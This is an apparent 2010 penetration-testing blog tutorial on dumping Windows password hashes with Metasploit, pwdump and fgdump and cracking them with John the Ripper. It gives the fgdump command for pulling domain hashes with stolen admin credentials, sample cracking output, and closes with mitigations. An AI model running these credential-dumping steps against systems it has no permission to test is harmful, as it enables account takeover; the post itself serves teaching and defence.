Also, remember what I said earlier, only try this on your OWN equipment or where you have PERMISSION. Karma is a real thing, and so is jail ;o)

Wednesday, 7 July 2010

Cracking Windows passwords with fgdump and John the Ripper

This information is for educational purposes only. Do not break the law. Only use these techniques on your own test network, or where you have express permission. Remember it is your Karma, and see the mitigations for these threats at the bottom of this article.

Backtrack contains several flexible and powerful password brute-forcing tools, including Rainbowcrack, Hydra, Medusa, and John the Ripper.

John the Ripper (jtr) is very easy to use, but first we need some hashes to crack.

There are a several ways of getting the hashes, here are some examples of methods I have successfully used in pentests.
  1. Pwn a system with Metasploit, and use the "use priv" and "hashdump" commands to obtain the local password hashes
  2. Use pwdump.exe to dump the local password hashes of a system
  3. Use fgdump.exe to dump all domain passwords remotely from a domain controller (having already pwned a domain administrator password)
Looking more closely at option 3. here is the syntax that could be used, where username and password are the previously obtained details of a domain admin:

c:\ fgdump.exe -h hostname -p password -u username

This is a very flexible tool, and more advanced options for fgdump.exe are available here

Whichever of these ways is used you will get a hash-dump file, this file will typically have a format which looks something like this:


As you can see, we have two types of hashes here, an LM hash (starting E52C) and an NTLM hash (starting A4F4)

To run a basic crack with jtr, you could use the following commands:


(This runs a script which sets up a few things and puts you in the correct directory, then...)

./john passwordhashes.txt
Loaded 1 password hashes with no different salts (LM DES [128/128 BS SSE2])
D                (MyUser:2)
PASSWOR          (MyUser:1)

And in a few seconds, bada bing bada boom, you have some passwords ;o)

As you can see, because of the way that LM hashes are created and stored, they are cracked in two halves which are only 7 characters long and uppercase only, which makes them much quicker crack - and so less secure. Dictionary and hybrid attacks are used by default, making the use of this tool very easy. 

John also keeps track of hashes it has cracked already in the john.pot file, so take note of that too.

For more info, take a look at

Mitigations for these tools and techniques could be:
  • Many Antivirus products will block tools such as fgdump.exe and pwdump.exe as "hacking tools", which can prevent basic users from using these tools on their systems
  • Strong password policies and regular audits can prevent easy dictionary words being used as passwords, and enable regular password changes
  • Disabling LM hashes makes hash cracking more timeconsuming from the attackers perspective
  • Long NTLM passwords are very timeconsuming to attack with brute force